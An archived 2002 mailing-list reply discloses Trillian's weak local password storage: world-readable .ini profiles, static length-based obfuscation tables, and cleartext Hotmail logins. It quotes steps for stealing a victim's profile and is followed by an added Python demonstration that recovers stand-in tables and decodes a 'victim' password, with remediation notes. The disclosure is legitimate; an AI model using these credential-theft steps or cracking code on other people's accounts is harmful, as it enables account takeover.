RE: Trillian Messaging Software

From: Ben Floyd (dataplex17at_private)
Date: Thu Jun 06 2002 - 13:11:55 PDT


    >From: "Don Weber" <Donat_private>
    ...
    
    >we use it here primarily for the ability it provides in secure messages 
    >over ICQ and one of the others it supports. As far as security, it does, I 
    >believe, store passwords and the like in the registry and other text files. 
    >Here's an old post I just found again related to Trillian, but I'd think 
    >personally, if someone can get to this, you're already in trouble.
    
    I brought this up with the developer of Trillian several months ago because 
    I did some testing of the client when it first came out.  I was informed 
    that security was only a temporary fix and that eventually everything is 
    broken, so it is not worth wasting development time on.  On machines with 
    multiple users (Win2k, XP), Trillian does not do any file protection (the USERS 
    group is allowed read/execute access to the default directory).
    
    The encryption scheme used is very simple to crack.  It uses static tables 
    defined in the program to generate the passwords based on length, i.e., 
    passwords that are between 1-5 characters (if I remember correctly) use one 
    table, 6-15 characters use another, and anything over that uses a third 
    table.  To crack it, you can simply compare passwords of various lengths to 
    the previous password that was used, and in this manner recreate the table 
    used in under 20 minutes.
    
    Another issue that I found was that when accessing a Hotmail account from 
    Trillian, the password is passed to the server in cleartext.  If anyone 
    wants a user's Hotmail password, they only have to wait for the user to 
    access their account and run a browser cache recovery tool.
    
    After the hostile meeting with the developer I determined that Trillian was 
    not worth my time or the risk associated with using it.  If the local 
    security is that weak, I only wonder what the "encrypted chat" algorithms 
    look like.
    
    >Trillian has a system that creates .ini files for connecting to the
    >respective messenger services such as MSN, Yahoo, IRC, etc., which it stores 
    >in the users' directory. For example, the settings of a particular user are 
    >stored in his default user's directory. For connecting to MSN there is a 
    >file called msn.ini. For Yahoo there is yahoo.ini. And so on. These files 
    >include the details of that user such as his email id to connect to that 
    >service, his contact list, display options, and all that stuff.
    >But one thing that seems particularly interesting is that it stores
    >the password to the service in an elementary encrypted format.
    >Trillian does not forbid access to any user's .ini files in any manner.
    >That leaves a huge security hole in the whole system. Anybody can just copy
    >and paste the "Profile" of the person to his own msn.ini file and gain full
    >access to the victim's respective service. Also the masked password appears
    >in the connection manager field, which can be easily unmasked using a
    >password revealer like Cain, thus revealing the password of that person. So
    >all you need to do is just gain access to the victim's .ini files in the
    >Trillian>>Users>>Victim folder and the work is done.
    >The .ini file looks like this:
    >for example, for msn service
    ...
    
    -dpx
    =======================
    http://www.dataplex.org
    Email: dpxat_private
    =======================
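The table-recovery attack sketched in the message above (a static per-position table selected by password length, recovered by comparing the stored form of passwords you set yourself) is worked through below. This is an added example, not code from the thread, from Trillian or from its author: the XOR transform, the bucket boundaries 1-5 / 6-15 / 16-32, the byte tables and the `[Profile]`, `Email` and `Password` .ini fields are all constructed stand-ins, since the post gives neither the real tables nor the real file layout, only that there are three length-based static tables. The attacker side needs nothing but an account it controls: set a password of each length, read back the stored value, and key[i] = cipher[i] ^ plain[i] yields the table one position at a time, with a change at position 0 marking a bucket boundary.

```python
"""Chosen-plaintext recovery of a static, length-bucketed obfuscation table.

Added example (not Trillian's code). The transform, tables, bucket bounds and
.ini field names below are constructed stand-ins for the scheme the post
describes; the real values are not given in the thread.
"""
import configparser

# Constructed tables, one per length bucket (hypothetical values).
TABLES = [
    (1, 5, bytes([0x5A, 0x13, 0xC7, 0x2E, 0x91])),
    (6, 15, bytes(range(0x30, 0x30 + 15))),
    (16, 32, bytes(range(0xA0, 0xA0 + 32))),
]


def _table_for(length):
    for lo, hi, table in TABLES:
        if lo <= length <= hi:
            return table
    raise ValueError("unsupported password length %d" % length)


def obfuscate(password):
    """Client side: XOR each byte with the bucket's table (a stand-in for the
    'elementary encrypted format') and store the result as uppercase hex."""
    data = password.encode("latin-1")
    table = _table_for(len(data))
    return bytes(b ^ k for b, k in zip(data, table)).hex().upper()


def render_ini(email, password):
    """An msn.ini-style profile as the client might write it (constructed layout)."""
    return "[Profile]\nEmail=%s\nPassword=%s\n" % (email, obfuscate(password))


def recover_tables(oracle, max_len):
    """Attacker side. We control our own account, so we can set a password of
    every length and read back what the client stores. With a static table
    applied per position, key[i] = cipher[i] ^ plain[i]. A length whose key
    bytes agree with the prefix recovered so far shares the table and extends
    it by one byte; a disagreement at position 0 marks a new bucket.
    Assumes distinct tables differ in their first byte (true for the
    constructed tables above)."""
    buckets = []  # (min_len, max_len, recovered table bytes)
    for length in range(1, max_len + 1):
        plain = bytes(0x41 + i for i in range(length))  # 'A', 'B', 'C', ...
        cipher = bytes.fromhex(oracle(plain.decode("latin-1")))
        key = bytes(c ^ p for c, p in zip(cipher, plain))
        if buckets and key[: len(buckets[-1][2])] == buckets[-1][2]:
            lo = buckets[-1][0]
            buckets[-1] = (lo, length, key)
        else:
            buckets.append((length, length, key))
    return buckets


def deobfuscate(hex_value, buckets):
    """Decode a stored value using the tables recovered above."""
    cipher = bytes.fromhex(hex_value)
    for lo, hi, table in buckets:
        if lo <= len(cipher) <= hi:
            return bytes(c ^ k for c, k in zip(cipher, table)).decode("latin-1")
    raise ValueError("no recovered table covers length %d" % len(cipher))


def crack_ini(ini_text, buckets):
    """Given a copy of another user's .ini, return (email, cleartext password)."""
    cfg = configparser.ConfigParser()
    cfg.read_string(ini_text)
    profile = cfg["Profile"]
    return profile["Email"], deobfuscate(profile["Password"], buckets)


if __name__ == "__main__":
    recovered = recover_tables(obfuscate, 20)
    for lo, hi, table in recovered:
        print("lengths %2d-%2d: table %s" % (lo, hi, table.hex()))
    victim_ini = render_ini("victim@example.com", "hunter2!Secret")  # constructed
    print(crack_ini(victim_ini, recovered))
```

Run stand-alone, it recovers all three constructed tables from twenty chosen passwords and then decodes a constructed victim profile. The point is that any static, keyless transform is recoverable by whoever can both write and read a profile, which, per the post, was every member of USERS on a shared machine; a real fix is to protect the file with per-user ACLs and to derive the stored form from a per-user secret (DPAPI on Windows), not to pick a more elaborate table.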
    
    
    



    This archive was generated by hypermail 2b30 : Thu Jun 06 2002 - 14:23:33 PDT